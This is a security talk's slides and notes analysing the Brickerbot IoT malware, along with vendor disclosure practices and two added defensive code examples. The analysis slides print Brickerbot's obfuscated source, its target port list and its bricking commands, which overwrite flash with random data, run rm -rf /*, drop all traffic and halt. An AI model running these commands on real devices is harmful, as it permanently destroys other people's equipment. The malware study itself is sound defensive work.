  • 14. Brickerbot: Source code - eliminate dead code 1. def IIi1IIii11I1I(targetip, targetport): 2. global i1Iiii1i11i 3. O0000oO0O = (targetip, int(targetport)) 4. I11i1I = hash(O0000oO0O) 5. if I11i1I in iIIiii11Ii1: 6. return 7. IiI1i1ii1[I11i1I] = 0 8. ooOo0I1ii1i[I11i1I] = (targetip, int(targetport)) 9. oo0[I11i1I] = time.time() + i1Iiii1i11i * 60 10. iIoO000oO[I11i1I] = None 11. iIIiii11Ii1.append(I11i1I) 12. 13. def i1iiiiIi(targetip, targetport, jobhash): 14. O0000oO0O = (targetip, int(targetport)) 15. O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16. O0OOo00o00o.setblocking(0) 17. try: 18. O0OOo00o00o.connect(O0000oO0O) 19. except: 20. pass 21. I11i1I = hash(O0OOo00o00o) 22. O00OiiI1iIiiI.append(O0OOo00o00o) 23. Oooo0[I11i1I] = (targetip, int(targetport)) 24. Iii1iiiI[I11i1I] = 0 25. i1I11IIIIIi[I11i1I] = time.time() 26. I1iiO000o00o0[I11i1I] = jobhash 27. iIoO000oO[jobhash] = O0OOo00o00o 28. return O0OOo00o00o
  • 15. Brickerbot: Source code - Strings, bricking 1. ii11II += 2. '''busybox route del default 3. cat /dev/urandom >/dev/mtdblock0 & 4. cat /dev/urandom >/dev/mtdblock1 & 5. cat /dev/urandom >/dev/mtdblock2 & 6. cat /dev/urandom >/dev/mtdblock3 & 7. cat /dev/urandom >/dev/mtdblock4 & 8. cat /dev/urandom >/dev/mtdblock5 & 9. cat /dev/urandom >/dev/mmcblk0 & 10. cat /dev/urandom >/dev/mmcblk0p9 & 11. cat /dev/urandom >/dev/mmcblk0p12 & 12. cat /dev/urandom >/dev/mmcblk0p13 & 13. cat /dev/urandom >/dev/root & 14. cat /dev/urandom >/dev/mmcblk0p8 & 15. cat /dev/urandom >/dev/mmcblk0p16 & 16. ''' 17. ii11II += 18. '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null & 19. iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP 20. halt -n -f 21. reboot 22. '''
  • 17. “Zombie” cars - “It’s Zombie time.” We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
  • 18. “Zombie” cars So in order to stop Criminals from hijacking our cars and turning them into bombs...
  • 20. Security: Gaining industry buy-in; Doing it right?
  • 21. Security: Gaining industry buy-in; Doing it right 1. Get someone credible to organize/liaise with industry players a. Renderman 2. Provide guidelines for disclosure to vendors 3. Provide guidelines for communication with researchers 4. Suggest/provide solutions a. Mostly suggest. Nobody’s using provided code. 5. Branding a. Internet of Dongs Project b. DVEs(Dong Vulnerability and Exposures)
  • 23. Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
  • 24. Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
  • 25. Nixon is a great security researcher and I agree wholeheartedly with the first half of this statement. Attackers are using botnets primarily for profit. Distributed Denial of Service(DDOS) as a primary source of income. I respectfully disagree with the idea that the only solution is to turn to law enforcement. Unfortunately while Law enforcement has great powers of investigation and response after the fact, there are still a number of steps we can take to prevent attacks. Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
  • 26. Attackers exploiting botnets to perform large scale DDOSes has become common. Bots, or Robots or Zombies, whatever are nodes in a network of malicious machines. Traditionally attackers either infected machines with malware or on a less automated fashion convince users to perform like bots. LOIC is an example of software that allows users to participate in a DDOS. This is the simplest technique where each user is independent but collaborates with a multitude of like minded users. Imagine a hundred thousand individuals each with a single rifle all aiming at the same target. Some will miss. Some rifles will misfire. Some will never understand how to fire a bullet. Regardless a majority will hit the target. Of course the efficiency of such an attack is much less than one that eliminates human error. Infecting numerous bots is sometimes only the first step. An attacker with hundreds of thousands or millions of bots needs to do something with them. They make no money lying idle. This is where another traditional technique is used, DOSaaS(Denial of Service as a Service). I have a botnet, you pay me to take your target down, we all profit. Except the major site we’ve just knocked down. DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
  • 27. Attackers are looking to make a profit. The usual methods work, but they can be costly. There is a need to purchase or develop one’s own malware to build up one’s botnet. IoT botnets help to reduce those costs. Several IoT botnets have had their source code released by their authors. It turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no real authentication. Default credentials. Let me repeat that: default username/password combinations that users can’t easily change. Mirai made the big splash, using a long list of default credentials to log in to embedded devices and then turning them into bots. Having a list of default creds is useful, but more benevolent trespassers on one’s Internet-enabled cameras and home routers can also use the same list in order to log in and patch your systems. Linux.Wifatch is famous for being a worm that connects to IoT devices and patches them, locking out the bad guys. Linux.Hajime does something similar, locking down ports to prevent other botnets from connecting. As another show of good faith, the authors of Linux.Wifatch released the source code to their patching worm.[1] Good or bad, none of these worms would gain as much traction amongst IoT devices if it were possible for users to change the logins.
  [1] https://gitlab.com/rav7teif/linux.wifatch
  DDOS via IoT Botnet
  ● Similar to DDOSaaS
  ○ Except the bots are free
  ■ Even more free? Due to default creds.
  Mirai
  Linux.Wifatch
  Linux.Hajime
  • 28. Right, so: Brickerbot. Where Wifatch and Hajime do their part in securing devices by changing passwords or disabling outside access, Brickerbot goes about it in a slightly different manner. If we just brick all of these vulnerable IoT devices, they can’t be turned against us. Great idea. Mudge, of L0pht and DARPA, has heard about this idea too, from reasonable folks in the Intelligence Community and the Department of Defense. These are the kind of folks who get to take direct action. Except it seems even they couldn’t get away with bricking the devices of civilians in the US and all over the world.
  So, Brickerbot?
  • 29. The author of Brickerbot calls himself The Doctor. He has also posted on an underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor directly connects online identities or claims credit. Attribution is harder when all you have is the end result, such as a binary or an obfuscated script. A source code release, as the authors of Linux.Wifatch did, is a primary method of claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is like showing off portions of a wrecked fighter aircraft with any and all markings or identifying information missing or removed. It makes for a great showpiece and allows one to take or (more often) give credit. Other researchers suggest that some of the attacks that The Doctor claimed, such as one on a major mobile carrier’s network, were not performed by him, or at least not using any of the exploits contained in Brickerbot. Do we just take the word of whichever party we have a greater trust in? Absent a release of source or of forensic results from various attacks, it seems that’s the default position.
  Where are we?
  1) We may not be able to trust Brickerbot’s ‘author’
  2) The publicly available sample is essentially an obfuscated list of exploits and ‘bricking’ code
  3) We need to examine the Brickerbot code a little closer to see what we have
  • 30. Bricking is just turning useful devices into something as useful as a brick. This is a perfectly legal action that one can perform on devices that one owns. When done to others’ devices, it is almost always illegal and occasionally an act of war. To be clear, Brickerbot is intended to operate entirely on others’ devices.
  So, Brickerbot?
  ● What’s bricking?
  ○ Turning a useful device into something as useful as a ‘brick’
  • 31. Coming from the malware analysis side, I’m normally loath to help spread malware. In this case, the cat is out of the bag, the horses have left the barn, and there are dozens of pastebin-like sites and one or two github accounts with a copy of the released Brickerbot script. So if you would like a copy of the script in order to play along at home or analyze it, just google for the following line.
  Brickerbot: source code
  ● Want a copy of Brickerbot?
  ○ Google
  ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1”
  ● Mirrored on github and various pastebin-like sites
  • 32. A quick aside about the malware analysis process. Assuming you’re not doing it as a hobby, it’s almost always performed under pressure. One never has enough time to do a complete teardown, to check every nook and cranny of a given target. You may love puzzles and even enjoy completely solving them, but you never have that time at work. When you eventually do, it’s known as that nearly mythical time period: ‘vacation’. An analyst always has to deal with multiple competing pressures from various interested parties. In no particular order:
  ● Customers
  ● Bosses/Upper Management
  ● Competitors
  ● Press
  Depending on how one receives a sample, one or more of these will be aware and the clock starts ticking. One won’t always satisfy all parties. Regardless, handling the various competing interests is the job. Ok, you don’t have unlimited time. A customer is under attack. The press is minutes from publishing. Higher-ups are yelling at your boss for an update. What do you do? Generally one searches for IOCs (Indicators of Compromise). It really does become: what is the least I need to see before I know my home/office/business is irrecoverable?
  Aside: Malware analysis process - under pressure
  ● Not always enough time
  ○ fully unwind and solve every aspect of every puzzle within a sample
  ■ That’s called ‘vacation’
  ● Interested parties breathing down analysts’ necks
  ○ Customers, bosses, competitors, press
  ■ Handling these is ‘the job’
  ● Identify IOCs (Indicators of Compromise)
  ○ What is the least I need to see before I know my home/office/business is irrecoverable?
  • 33. What has The Doctor dropped in our collective laps? We’ve got a script that appears obfuscated. No line listing the interpreter the shell should use. First steps for analyzing this malware:
  1) Let’s see if it runs
  a) Make sure the VM has no network access
  b) Include possible runtimes (python2, python3)
  Shocker! It doesn’t run. Why? Running with Python 3 fails, mainly due to the print statement becoming a function in Python 3. Thus we know it’s Python 2. Running under Python 2 it fails: symbol not found. In this case due to additional whitespace turning a function call into an undefined symbol. Next, we need to remove extraneous whitespace. Re-run and it fails again. This time due to not a single library being imported. You have to be kidding me. The script as provided was never intended to run.
  2) Maybe de-obfuscating the script would simplify the analysis
  ● Writing a custom de-obfuscator is a good solution; unfortunately it’s a vacation project. We’ve still got a job to do.
  ○ It’s good to get acquainted with tokenizer.py for that eventual vacation
  ● We can still write a one-off script to quickly remove dead code. Dead code being things like if statements that are always false, or statements
  Brickerbot: Getting to the heart of the issue
  ● Malware analysis
  ○ Get it running (VM, python(s), no network)
  ■ Nope, bad interp. Python2
  ■ Nope, symbol not found. ‘Extra’ whitespace.
  ■ Nope, libraries not imported. Enough nonsense.
  ○ De-obfuscate
  ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’.
  ● (still, become friends with tokenizer.py)
  ■ Custom script to remove dead code
  ● Become friends with PyLint
  ■ Pretty-print remainder of source
  • 34. Now that you’ve figured out it’s non-functional, it’s time to find all the low-hanging fruit. In this case, the author provided the initial hint, suggesting that one could just check the unencrypted/unobfuscated strings. One of the first steps in statically analyzing any malware is to extract all strings. Really. Some of the best clues for attribution come from identifiers left in the code, or shout-outs to colleagues or malware researchers. Egos have led to a number of malware authors getting convicted. In the case of Brickerbot, the simple obfuscation used by the author removes all identifiers (i.e. variable names, messages, etc.). It’s more about not having it tied back to the author than making it difficult to learn how the worm operates. Another time-saver used in analysis is to read other analysts’ reports. This lets you see if you’ve missed anything important (e.g. malware emailing all your contacts). It also lets you redirect analysis to portions of the malware not yet analyzed or to specific payloads. With Brickerbot, since it won’t run and much of the code is useless, an analyst can look at it as a container for various IoT device exploits.
  Brickerbot: Getting to the heart of the issue, cont.
  ● Malware analysis
  ○ Examine low-hanging fruit
  ■ Strings
  ● Seriously
  ● First step used by malware analysts
  ■ Read reports by other analysts
  ● Catch what you missed/ran out of time to find
  ● Re-prioritize resources towards areas that have greatest impact
  • 35. Let’s look at the Brickerbot source code. Random, similar-looking variable names, more whitespace than necessary. This looks horrible. The if statements where the conditional is equivalent to 0 will never run the code that follows. Dead code. There are spaces in function calls. These don’t even help readability, so the sleep call on line 7 isn’t actually a .sleep() call, it’s just the undefined symbol time, a dot, and the undefined symbol sleep. Much of this can be removed as described earlier with a custom script to delete all dead code.
  Brickerbot: Source code - obfusc., ex. whitespace
  1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
  2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
  3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
  4. if 21 - 21: Oooo - I11I1Ii
  5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
  6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
  7. time . sleep ( 3 )
  8. if 20 - 20: Oo0
  9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
  10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
  11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
  12. if 84 - 84: I11I1Ii * Ii11i1iIi
  13. I1IiI1I1 = OOo0O0oOOOO
  14. if 4 - 4: Oooo + oOOo0000o
  15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
  16. i111IIIiII1i = False
  17. Oo0O00OOooO = False
  18. IiiI1 = False
  19. oOI11IIIi1II111 = True
  20. iiIII11I1i1Ii = True
  21. I1i = True
  22. i11iiiIi = True
  23. i1iii = True
  24. OOoOo00oO0 = True
  25. OO00oo0o = True
  26. if 5 - 5: IIiII + O0oo - i1
  27. if 52 - 52: oOoO0Ooo / Ii / Ii
  28. if 24 - 24: oOOoO00oo0
  29. i11 = [ ]
  30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ]
  31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
  • 36. Ok, now things are looking a bit cleaner; we can see functions. Names that have been obfuscated are lost, but one can eventually rename them according to their function, similar to what one does with functions in an unknown binary. This is also after pretty-printing the script so that we get rid of the excessive/additional whitespace. Also, as mentioned earlier, no libraries are imported so the code still won’t run. You should be getting a better picture of the roadblocks placed in the code.
  Brickerbot: Source code - eliminate dead code
  def IIi1IIii11I1I(targetip, targetport):
      global i1Iiii1i11i
      O0000oO0O = (targetip, int(targetport))
      I11i1I = hash(O0000oO0O)
      if I11i1I in iIIiii11Ii1:
          return
      IiI1i1ii1[I11i1I] = 0
      ooOo0I1ii1i[I11i1I] = (targetip, int(targetport))
      oo0[I11i1I] = time.time() + i1Iiii1i11i * 60
      iIoO000oO[I11i1I] = None
      iIIiii11Ii1.append(I11i1I)

  def i1iiiiIi(targetip, targetport, jobhash):
      O0000oO0O = (targetip, int(targetport))
      O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      O0OOo00o00o.setblocking(0)
      try:
          O0OOo00o00o.connect(O0000oO0O)
      except:
          pass
      I11i1I = hash(O0OOo00o00o)
      O00OiiI1iIiiI.append(O0OOo00o00o)
      Oooo0[I11i1I] = (targetip, int(targetport))
      Iii1iiiI[I11i1I] = 0
      i1I11IIIIIi[I11i1I] = time.time()
      I1iiO000o00o0[I11i1I] = jobhash
      iIoO000oO[jobhash] = O0OOo00o00o
      return O0OOo00o00o
  • 37. Now we can go back to step 1 of the static malware analysis process: searching for strings. This particular segment includes commands that overwrite storage on a particular device with random data. Routes and firewall rules are cleared from memory and deleted. Then the system is stopped and rebooted. By now there should be no code left to run, so your home router is now useless. So what do we know now?
  1) this code is annoying
  2) so is The Doctor
  3) all devices with the default username and password will get disabled permanently
  4) Vulnerable devices are fixed now; since they can’t work, they’re safe
  So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger embedded systems and Internet-connected devices face similar threats? Can a Brickerbot for my washing machine be far away? Would other larger devices be more vulnerable? Say, my car?
  Brickerbot: Source code - Strings, bricking
  ii11II += '''busybox route del default
  cat /dev/urandom >/dev/mtdblock0 &
  cat /dev/urandom >/dev/mtdblock1 &
  cat /dev/urandom >/dev/mtdblock2 &
  cat /dev/urandom >/dev/mtdblock3 &
  cat /dev/urandom >/dev/mtdblock4 &
  cat /dev/urandom >/dev/mtdblock5 &
  cat /dev/urandom >/dev/mmcblk0 &
  cat /dev/urandom >/dev/mmcblk0p9 &
  cat /dev/urandom >/dev/mmcblk0p12 &
  cat /dev/urandom >/dev/mmcblk0p13 &
  cat /dev/urandom >/dev/root &
  cat /dev/urandom >/dev/mmcblk0p8 &
  cat /dev/urandom >/dev/mmcblk0p16 &
  '''
  ii11II += '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
  iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP
  halt -n -f
  reboot
  '''
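  The analysis steps on slides 33 through 37 (drop the constant-false if statements, pretty-print what is left, then read the strings and the pieces appended to the payload variable) as one added worked example. This is not Brickerbot code and not the speaker's own tooling; it is an analyst helper written for this page. SAMPLE is a constructed stand-in that copies the obfuscation style of the slide (constant-false guards, spaced-out calls, look-alike identifiers); its payload text is a placeholder, not the real bricking commands. It needs Python 3.9 or later for ast.unparse.

```python
# Added example, not Brickerbot code and not the speaker's tooling: the
# "remove dead code, pretty-print, then read the strings" steps from the
# analysis above, done with Python's ast/tokenize modules. SAMPLE is a
# constructed stand-in in the slide's obfuscation style (constant-false
# `if` guards, spaced-out calls, look-alike names); the payload text in it
# is a placeholder, not the real bricking commands. Needs Python 3.9+.
import ast
import io
import operator
import tokenize

SAMPLE = '''\
if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
time . sleep ( 3 )
if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
i111IIIiII1i = False
II1I1i11 = [ 23 , 2222 , 2323 , 7547 ]
ii11II = ""
ii11II += """CONSTRUCTED_PAYLOAD_PART_ONE
"""
if 20 - 20: Oo0
ii11II += """CONSTRUCTED_PAYLOAD_PART_TWO
"""
def IIi1IIii11I1I(targetip, targetport):
    if 4 - 4: Oooo + oOOo0000o
'''

_BINOPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Mod: operator.mod,
}


def fold_numeric(node):
    """Evaluate an expression built only from numeric literals and arithmetic.
    No eval(): a name, call or non-number anywhere raises ValueError."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](fold_numeric(node.left), fold_numeric(node.right))
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -fold_numeric(node.operand)
    raise ValueError("not a numeric constant expression")


class DeadIfRemover(ast.NodeTransformer):
    """Drop `if` statements whose test folds to 0; keep any else branch."""

    def __init__(self):
        self.removed = 0

    def visit_If(self, node):
        self.generic_visit(node)
        try:
            dead = fold_numeric(node.test) == 0
        except (ValueError, ZeroDivisionError):
            dead = False          # not a pure constant (or e.g. 5 / 0): leave it
        if dead:
            self.removed += 1
            return node.orelse    # an empty list deletes the statement outright
        return node

    def generic_visit(self, node):
        super().generic_visit(node)
        # A function or loop whose body was all dead code must not end up
        # empty, or the pretty-printed result would no longer parse.
        if (hasattr(node, "body") and isinstance(node.body, list)
                and not node.body and not isinstance(node, ast.Module)):
            node.body = [ast.Pass()]
        return node


def remove_dead_code(source):
    """Return (pretty-printed source without constant-false ifs, count removed)."""
    remover = DeadIfRemover()
    tree = ast.fix_missing_locations(remover.visit(ast.parse(source)))
    return ast.unparse(tree), remover.removed


def extract_strings(source):
    """Every string literal in source order. tokenize rather than ast, so this
    also works on Python 2 sources that ast.parse rejects (print statements)."""
    found = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.STRING:
            try:
                found.append(ast.literal_eval(tok.string))
            except (ValueError, SyntaxError):   # e.g. an f-string on older Pythons
                found.append(tok.string)
    return found


def collect_appended_strings(source):
    """Re-join `name += '...'` fragments per variable in source order, which is
    how the payload string on the slide is assembled piece by piece."""
    parts = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.AugAssign) and isinstance(node.op, ast.Add)
                and isinstance(node.target, ast.Name)
                and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)):
            parts.append((node.lineno, node.col_offset, node.target.id, node.value.value))
    joined = {}
    for _, _, name, text in sorted(parts):
        joined[name] = joined.get(name, "") + text
    return joined


if __name__ == "__main__":
    cleaned, n = remove_dead_code(SAMPLE)
    print(f"removed {n} dead if-statements\n{cleaned}\n")
    print("strings:", extract_strings(SAMPLE))
    print("assembled:", collect_appended_strings(SAMPLE))
```

  Run it as a script to see the cleaned listing; on the constructed SAMPLE it removes five guards, turns `time . sleep ( 3 )` into `time.sleep(3)`, leaves the function with a `pass` body instead of nothing, and reassembles the two `+=` fragments into one string. The folding deliberately refuses anything that is not a numeric literal expression, so an `if` that depends on a name or a call is never dropped, and a guard that would raise at runtime (division by zero) is left in place for the analyst to look at.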
  • 38. What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see what an expert on automotive security thinks. Charlie Miller is formerly of the NSA, but has made a name for himself in the private sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain Picard: clever and wise. He wrote the first public exploits for Android and iOS, on the Google G1 and original iPhone. Later he and Chris Valasek received a grant from DARPA’s Cyber Fast Track program (the same one founded by Mudge) to research automotive security. So he moved on from hacking PCs, to hacking phones, to hacking the very cars you and I drive. And people complained, ‘but those aren’t remote exploits. You’ve got to be in the car to hack them. Any crook can do that.’ And verily, Charlie and Chris developed remote exploits. So when Charlie says that
  1) it’s not simple to hack all the cars
  2) there aren’t as many people hacking cars
  you’d do well to believe him.
  “Zombie” cars
  • 39. Except movie hackers… If you’ve seen the seminal ‘Hackers’ (1996) you know that “real” hackers can be identified by their hairstyles. Dreadlocks, in fact, possibly being a necessary factor in successful cyber attacks, e.g. Matthew Lillard’s character Cereal Killer. As one can see, Ms. Theron’s character, Cypher, must be quite the criminal hacker. After all, the main heroes in the film (Johnson, Diesel & Statham) lack both hair and computer skills. Realistically one can get a better sense of the threat posed by Cypher by viewing her environment. She is obviously well-funded (either state-backed or via independent fortune) and employs a full team of experts, especially experts that can hack cars. When an underling tells her there are a couple thousand cars in the vicinity of her target, she orders him to hack all of them. Yes, all of them. Never mind the brand, the telematics system, any and all firmware (or lack of such) within each of these thousands of automobiles. Those hacker dreads must confer some extreme hacking powers.
  “Zombie” cars - “It’s Zombie time.”
  We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
  • 40. We should just brick everybody’s car in a 5-mile radius. It’s not like anyone needs to get to work, pick up their kids, drive a buddy to the hospital, or drive for Lyft/Uber. Maybe they didn’t really need their personal cars. This goes back to the original idea of abdicating any responsibility as developers and manufacturers of IoT devices to law enforcement, or in the case of The Doctor, to vigilantes. It’s a common idea that fixing bugs at the earliest point in development is many times cheaper and less dangerous than patching them after release. Though we can’t always fix before customers take possession. It’s possible to release firmware updates and patches afterwards, but there is not always an incentive to do so. The manufacturer of my car will occasionally release updates for the telematics system living in my dash, but the manufacturer of my new Internet-enabled toaster might say it’s no longer supported. This is not usually a problem. Until attackers not as benevolent as the Wifatch and Hajime authors or Charlie & Chris discover and exploit a vulnerability to turn your new Mustang into a torpedo. With Miller & Valasek I know they’ll make an effort to reach out to the manufacturer and enable a patch or update to be created. We can learn lessons from the way vulnerability reports are handled on other platforms. Embedded systems and IoT devices are not as dissimilar from desktop and server PCs as one would think. The same way security researchers reach out to Apple or Google for bugs in their phone OSes, they can reach out to various device manufacturers.
  “Zombie” cars
  So in order to stop Criminals from hijacking our cars and turning them into bombs...
  • 41. It can be difficult to get industry members to agree on issues like vulnerability disclosure, regular patching and, in general, working with outside security researchers. It is very much like the common description of ‘herding cats’. While many of the players may look similar and even share similar interests, it is difficult to get them all to come to the table. Each company has no special reason to trust another. It usually takes commonly trusted individuals and backing from companies with greater resources just to begin the conversation. Fortunately we’re seeing motion towards that goal in a small subset of the Internet of Things/Internet-connected embedded devices.
  Security: Gaining industry buy-in
  • 42. Security: Gaining industry buy-in; Doing it right?
  • 43. How do we get all these cats eating peacefully at the same bowl? We can start by selecting someone credible and widely trusted as a focal point for the multitude of players. Get a Pied Piper that all the cats can turn towards. In this case that would be Renderman (Brad Haines), a well known and respected security researcher. He’s also a CISSP. Renderman has a wide range of experience with penetration testing, wireless security and computer security research. He is a published author and a speaker at numerous computer security (Black Hat USA) and hacker (Def Con) conferences. The interesting part of this is that Renderman is operating within the category of items that fall under the heading ‘Adult Sex Toys’ on Amazon.com. One might have expected that other personal IoT devices, such as fitness trackers, would be where more security research would occur. The recent information leak from Strava, which showed running paths of US armed forces members, is one such area of research. Here a personal IoT device’s lack of default security and privacy controls ends up violating Operational Security (OPSEC) at US bases around the world. The main threat is not the bases’ locations (arguably opposition forces and host countries already have that knowledge), but rather current intelligence confirming activity at the bases and possibly the number/names of active personnel. Renderman has accomplished something that those of us in other specialties (e.g. Antivirus/Anti-malware) haven’t: he’s managed to convince disparate manufacturers to trust him, both as a source of best security practices and as an interface to the wider community of vulnerability researchers and hackers.
  Security: Gaining industry buy-in; Doing it right
  1. Get someone credible to organize/liaise with industry players
  a. Renderman
  2. Provide guidelines for disclosure to vendors
  3. Provide guidelines for communication with researchers
  4. Suggest/provide solutions
  a. Mostly suggest. Nobody’s using provided code.
  5. Branding
  a. Internet of Dongs Project
  b. DVEs (Dong Vulnerability and Exposures)
  • 44. Q: What sort of threat model are IoT vendors using? A: Good question. Default credentials imply there is no threat model. A basic threat model would take into account the simplest attacker, your common script kiddie. Take a dictionary of default credentials and a list of target addresses and feed them to a scanner or ready-made tool. Even after the number of in-the-wild IoT worms we’ve seen, the script kiddie would still end up with control of a significant number of IoT devices. Unfortunately security is currently, at best, an afterthought for a large number of vendors. A proper threat model would need to take into account attackers of various skill levels and budgets. Script kiddies might be kept at bay by simply allowing users to easily change passwords, or by using public-key cryptography to ensure firmware updates come only from the manufacturer, which would also protect the device from script kiddies. Best practices in security will overall protect the bulk of users. If your threat model also includes nation-state actors, then it’s likely your development budget is of a commensurate size. It would also need to consider the attack surface for a given device. Does it connect to the Internet? Is the firmware protected from modification? Can an attacker cause the Li-ion batteries to overload/ignite? Is it possible to inject malicious traffic into the stream of commands sent to the device? Regardless, these are factors that need to be considered at the beginning of the development cycle and not once the product is in the hands of consumers. Once there, it is considerably more expensive to mitigate (e.g. by patching, or recalling devices).
  Questions?
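  The "let users change the password" mitigation from the threat-model answer above, as an added worked example: a credential policy a device's login service could enforce against the simplest attacker in that model, a scanner fed a dictionary of factory defaults. This is example code written for this page, not from the talk and not any vendor's firmware; the default-password list, the factory account and the lockout numbers are constructed placeholders.

```python
# Added example, not from the talk or any vendor's firmware: the "let users
# change the password" mitigation turned into a policy a device's login
# service could enforce. The default-password list, the factory account and
# the numbers below are constructed placeholders.
import hashlib
import hmac
import os
import time

# Constructed sample of factory defaults of the kind IoT worms scan with.
KNOWN_DEFAULT_PASSWORDS = {"admin", "root", "1234", "password", "12345", "user"}
MIN_PASSWORD_LEN = 8
MAX_FAILURES = 5          # remote failures before lockout (constructed value)
LOCKOUT_SECONDS = 300     # constructed value
PBKDF2_ROUNDS = 100_000


class DeviceAuth:
    """Password store for one device account: salted PBKDF2, a first-boot
    gate that keeps the factory password off the network, and a lockout so
    a default-credential dictionary cannot be tried at wire speed."""

    def __init__(self, factory_user, factory_password, now=time.monotonic):
        self.now = now                    # injectable clock for testing
        self.user = factory_user
        self.salt, self.digest = self._hash(factory_password)
        self.must_change = True           # factory credentials still in place
        self.failures = 0
        self.locked_until = 0.0

    @staticmethod
    def _hash(password, salt=None):
        salt = salt if salt is not None else os.urandom(16)
        return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

    def _check(self, user, password):
        # Always compute the hash and compare in constant time, so a wrong
        # user name costs the same as a wrong password.
        _, digest = self._hash(password, self.salt)
        user_ok = hmac.compare_digest(user.encode(), self.user.encode())
        return hmac.compare_digest(digest, self.digest) and user_ok

    def set_password(self, user, old_password, new_password):
        """Local (console) password change; refuses known factory defaults."""
        if not self._check(user, old_password):
            return False, "current credentials wrong"
        if new_password in KNOWN_DEFAULT_PASSWORDS or len(new_password) < MIN_PASSWORD_LEN:
            return False, "new password is a factory default or too short"
        self.salt, self.digest = self._hash(new_password)
        self.must_change = False
        self.failures = 0
        return True, "ok"

    def remote_login(self, user, password):
        """Network-facing login: nothing is accepted while the factory
        password is still set, and repeated failures trigger a lockout."""
        if self.must_change:
            return False, "factory credentials still set; change them on the local console"
        if self.now() < self.locked_until:
            return False, "locked out"
        if self._check(user, password):
            self.failures = 0
            return True, "ok"
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.locked_until = self.now() + LOCKOUT_SECONDS
            self.failures = 0
        return False, "bad credentials"


def demo():
    """Walk the policy through with a fake clock; returns the outcomes in order."""
    clock = [0.0]
    dev = DeviceAuth("admin", "admin", now=lambda: clock[0])
    outcomes = [
        dev.remote_login("admin", "admin"),                   # scanner with defaults: refused
        dev.set_password("admin", "admin", "1234"),           # still a default: refused
        dev.set_password("admin", "admin", "correct-horse-battery"),
        dev.remote_login("admin", "correct-horse-battery"),   # real owner: ok
    ]
    for _ in range(MAX_FAILURES):
        outcomes.append(dev.remote_login("admin", "admin"))   # dictionary attempts
    outcomes.append(dev.remote_login("admin", "correct-horse-battery"))  # locked out
    clock[0] += LOCKOUT_SECONDS + 1
    outcomes.append(dev.remote_login("admin", "correct-horse-battery"))  # ok again
    return outcomes


if __name__ == "__main__":
    for ok, why in demo():
        print("accepted" if ok else "refused", "-", why)
```

  The three pieces map onto the threat model in the answer: the first-boot gate means a device still carrying its factory password is simply unreachable over the network, so a default-credential scan gets nothing even before the owner has acted; the default-list check stops the owner from "changing" the password to another value the same dictionaries contain; and the lockout turns a wire-speed dictionary run into a few attempts per window. None of this needs more than the standard library, which is the point for a device with a small firmware budget.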